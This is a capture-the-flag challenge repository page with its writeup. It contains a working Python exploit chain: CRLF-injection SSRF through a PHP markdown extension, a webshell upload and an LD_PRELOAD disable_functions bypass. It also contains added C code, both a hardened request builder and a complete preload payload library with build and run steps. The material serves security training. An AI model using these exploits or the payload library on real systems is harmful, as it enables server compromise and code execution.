# imagemlt/CISCN_2019_final_pmarkdown

* Repository: https://github.com/imagemlt/CISCN_2019_final_pmarkdown (GitHub; language: C; created 2019-07-27; last push 2019-07-27; previously named imagemlt/ciscn_2019_final_pmarkdown; 21 stars, 2 forks; no license file)
* Description: CISCN finals web11 pmarkdown (a junk challenge; apologies to the masters)
* Archive download: https://codeload.github.com/imagemlt/CISCN_2019_final_pmarkdown/tar.gz/refs/heads/master
* Corpus record: https://awesome.ecosyste.ms/projects/github.com%2Fimagemlt%2Fciscn_2019_final_pmarkdown (last synced 2025-04-13)

The repository README follows, translated from Chinese.

# Challenge design notes

## Challenge info:

* Challenge name: MarkDiary
* Estimated difficulty: medium-hard (easy / medium-easy / medium-hard / hard)


## Challenge description:
```
My Mark Diary level 2
```

## Skills tested:
```
1. Reversing a PHP extension
2. SSRF
3. Bypassing disable_functions via LD_PRELOAD
```

## Solution outline:
After entering the site, a blog post gives a hint: the post is rendered with a home-grown PHP markdown extension. The extension file can therefore be downloaded, and reversing it reveals an SSRF vulnerability in the extension. The file-upload endpoint checks the source IP of the request, so the SSRF (whose requests originate from the server itself) can be used to upload a webshell. The extension also invokes an external program, so LD_PRELOAD can be used to bypass disable_functions.


## Hints:
1. SSRF
2. .htaccess php://filter
3. LD_PRELOAD


## Original flag and update command:

```shell
    # original flag
    flag{flag_test}
    # ..
    # flag update command
    echo 'flag{85c2a01a-55f7-442a-8712-3f6908e1463a}' > /flag
```


## Environment:
```
1. ubuntu 14.04 LTS (fully updated)
2. Apache/2.4.7 (Ubuntu)
3. PHP 5.5.9-1ubuntu4.25
```

## Build process:
1. Design the vulnerabilities and write the PHP code.
2. Write the Dockerfile following "Docker示例文档.md" and build the image.

## Writeup:
![1](./img/1.png)
    Source code read through a php:// stream wrapper (see the php://filter hint)
* Reversing pmarkdown.so reveals an SSRF, which reaches upload.php
```python
# Python 2 (str.decode('hex')); the hex payload itself is not reproduced on this page.
import re
import requests


def exploit(url, timeout=10):
    # Second, fully attacker-controlled HTTP request (the multipart upload to
    # upload.php carrying the webshell), stored as a hex string.
    data = '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'.replace('\n', '')
    data = data.decode('hex')
    # CRLF injection through the extension's SSRF: the 'debug' value closes the
    # request the extension is building and pipelines the upload request behind
    # it on the same keep-alive connection, so upload.php sees it arrive from
    # localhost and its source-IP check passes.
    requests.post(url + '/index.php',
                  data={'debug': "sadfas HTTP/1.1\r\nHOST:localhost\r\nConnection:Keep-Alive\r\n\r\n%s\r\n" % data},
                  timeout=timeout)
```
* LD_PRELOAD bypass of disable_functions, combined with the pmarkdown extension, to get a shell
```python
    # Continuation of exploit() above, after the SSRF upload. post.php?md=logout.md
    # now runs the PHP passed in 'a' through the uploaded webshell.
    # 1. Drop the preload library on the box.
    requests.post(url + '/post.php?md=logout.md', data={
        'a': 'move_uploaded_file($_FILES["aaa"]["tmp_name"],"/tmp/test.so");'
    },
        files={"aaa": ("filename1", open("test.so", "rb"))},
        timeout=timeout)
    # 2. Set LD_PRELOAD (putenv is not disabled) and make the extension spawn its
    #    external program, which loads test.so before PHP's restrictions matter.
    requests.post(url + '/post.php?md=logout.md',
                  data={'a': 'putenv("LD_PRELOAD=/tmp/test.so");pmark_read("posts/logout.md");'},
                  timeout=timeout)
    # 3. Read back the result; test.so (not included on this page) is what leaves it in /tmp/flag.
    data = requests.post(url + '/post.php?md=logout.md', data={
        'a': 'print_r(file_get_contents("/tmp/flag"));'
    }).content
    info = re.search(r'flag\{.*\}', data)
    return info.group(0)
```

## Notes

1. Challenge names must not contain special characters; use underscores instead of spaces.
2. Complete the information in every folder according to your challenge design.
3. Teams whose information in this folder is incomplete will have points deducted.
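The SSRF in the solution outline and the first writeup snippet is a CRLF injection: the value of `debug` is pasted into a raw HTTP request line that the extension sends to localhost, so a value containing `\r\n` ends that request and appends a second one. The following is an added example, not the challenge's pmarkdown.so source (which this page does not include): a constructed model of a vulnerable request builder beside a hardened one, plus a small request-line counter that shows the server seeing two requests. The `debug` shape and the upload.php target are from the writeup; the function names, the allowlist and the `POST /upload.php` stand-in for the hex payload are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable shape of the request builder (constructed, not the real extension):
 * the caller-controlled value goes straight into the request line.
 * Returns bytes written, or -1 if the buffer was too small. */
int build_request_unsafe(const char *value, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "GET /%s HTTP/1.1\r\nHost: localhost\r\n\r\n", value);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Hardened shape: the value is accepted only as one path segment built from a
 * small allowlist, so CR, LF, space and every other byte that could end the
 * request line or start a new one is rejected before any request is built. */
int build_request_safe(const char *value, char *out, size_t outlen)
{
    size_t len = strlen(value);
    if (len == 0 || len > 64)
        return -1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return -1;
    }
    return build_request_unsafe(value, out, outlen);  /* same formatting, now with a safe value */
}

/* Number of request lines an HTTP/1.1 server would see in this byte stream:
 * the first line of the stream and the first line after each "\r\n\r\n"
 * header terminator, whenever it looks like "<METHOD> <target> HTTP/1.1". */
int count_request_lines(const char *stream)
{
    int count = 0;
    const char *seg = stream;
    while (seg != NULL && *seg != '\0') {
        const char *eol = strstr(seg, "\r\n");
        size_t linelen = eol ? (size_t)(eol - seg) : strlen(seg);
        const char *sp = memchr(seg, ' ', linelen);
        if (sp != NULL && sp > seg && linelen >= 9 &&
            memcmp(seg + linelen - 9, " HTTP/1.1", 9) == 0)
            count++;
        const char *next = strstr(seg, "\r\n\r\n");
        seg = next ? next + 4 : NULL;
    }
    return count;
}

/* The writeup's 'debug' value, shaped exactly as in the exploit: a junk target
 * that finishes the request the extension started, a blank line, then the
 * second request that the attacker fully controls. */
int make_debug_value(const char *second_request, char *out, size_t outlen)
{
    int n = snprintf(out, outlen,
        "sadfas HTTP/1.1\r\nHOST:localhost\r\nConnection:Keep-Alive\r\n\r\n%s\r\n",
        second_request);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Constructed stand-in for the hex-encoded upload request the writeup sends;
 * the real one carries a multipart body with the webshell. */
static const char kSmuggledUpload[] =
    "POST /upload.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-Length: 0\r\n"
    "\r\n";

/* Requests the server sees when the vulnerable builder handles the payload. */
int demo_unsafe_request_count(void)
{
    char debug[512], stream[1024];
    if (make_debug_value(kSmuggledUpload, debug, sizeof debug) < 0) return -1;
    if (build_request_unsafe(debug, stream, sizeof stream) < 0) return -1;
    return count_request_lines(stream);
}

/* 1 if the hardened builder accepts the value, 0 if it rejects it. */
int safe_accepts(const char *value)
{
    char stream[256];
    return build_request_safe(value, stream, sizeof stream) > 0;
}

int main(void)
{
    char debug[512];
    make_debug_value(kSmuggledUpload, debug, sizeof debug);
    printf("vulnerable builder: server sees %d request(s)\n", demo_unsafe_request_count());
    printf("hardened builder accepts payload: %d\n", safe_accepts(debug));
    printf("hardened builder accepts \"notes.md\": %d\n", safe_accepts("notes.md"));
    return 0;
}
```

The second request rides on the extension's own connection to localhost, which is why the source-IP check on upload.php passes; the allowlist removes the CRLF split, but an extension that fetches arbitrary local URLs on behalf of a user is still an SSRF, so the endpoints reachable that way must not trust `127.0.0.1` as proof of anything.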
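The final writeup step (`putenv("LD_PRELOAD=/tmp/test.so"); pmark_read("posts/logout.md");`) works because `putenv` is usually left enabled, and the external program the extension spawns is a fresh dynamically linked process that inherits that environment and is not covered by PHP's disable_functions. The following is an added example of such a preload library in the usual shape (a constructor that scrubs LD_PRELOAD and runs a command); it is not the challenge's test.so, which the page does not include. The command variable name `PMARK_CMD` and the use of `/tmp/flag` as the output file (the file the writeup reads back) are assumptions of this example; the writeup's own library sets no such variable and presumably hard-codes its command.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PRELOAD_VAR "LD_PRELOAD"
#define CMD_VAR     "PMARK_CMD"   /* variable name assumed for this example */
#define OUT_FILE    "/tmp/flag"   /* the file the writeup reads back afterwards */

/* Fire only when the library is really being preloaded and has a command. */
int payload_armed(const char *preload, const char *cmd)
{
    return preload != NULL && *preload != '\0' && cmd != NULL && *cmd != '\0';
}

/* Drop LD_PRELOAD before spawning anything; otherwise the shell that system()
 * forks loads this library too and the constructor runs again in every child.
 * Returns 1 if the variable was set, 0 if there was nothing to remove. */
int scrub_preload(void)
{
    if (getenv(PRELOAD_VAR) == NULL)
        return 0;
    unsetenv(PRELOAD_VAR);
    return 1;
}

/* Shell line that captures the command's output where PHP can read it back. */
int build_command(const char *cmd, const char *outfile, char *buf, size_t buflen)
{
    int n = snprintf(buf, buflen, "(%s) > %s 2>&1", cmd, outfile);
    return (n < 0 || (size_t)n >= buflen) ? -1 : n;
}

/* The line the payload would run for PMARK_CMD="cat /flag". */
const char *example_command(void)
{
    static char line[256];
    return build_command("cat /flag", OUT_FILE, line, sizeof line) > 0 ? line : NULL;
}

/* Runs when the dynamic loader maps this library, before the host program's
 * main(). In the challenge that host is the external program pmarkdown.so
 * spawns from pmark_read(): it inherits the environment PHP set with putenv()
 * and PHP's disable_functions do not apply to it. */
__attribute__((constructor)) static void preload_init(void)
{
    const char *cmd = getenv(CMD_VAR);
    if (!payload_armed(getenv(PRELOAD_VAR), cmd))
        return;
    scrub_preload();
    char line[1024];
    if (build_command(cmd, OUT_FILE, line, sizeof line) > 0)
        system(line);   /* fork+exec happens with LD_PRELOAD already gone */
}
```

Build it with `gcc -shared -fPIC -o test.so preload.c`, upload it as the writeup does, then from the webshell run `putenv("LD_PRELOAD=/tmp/test.so"); putenv("PMARK_CMD=cat /flag"); pmark_read("posts/logout.md");` and read `/tmp/flag`. Two caveats a practitioner should check first: the spawned helper must be dynamically linked (the loader ignores LD_PRELOAD paths containing a slash for set-user-ID binaries, and a static binary loads nothing), and the trick disappears entirely if `putenv` is added to disable_functions or the extension stops spawning processes.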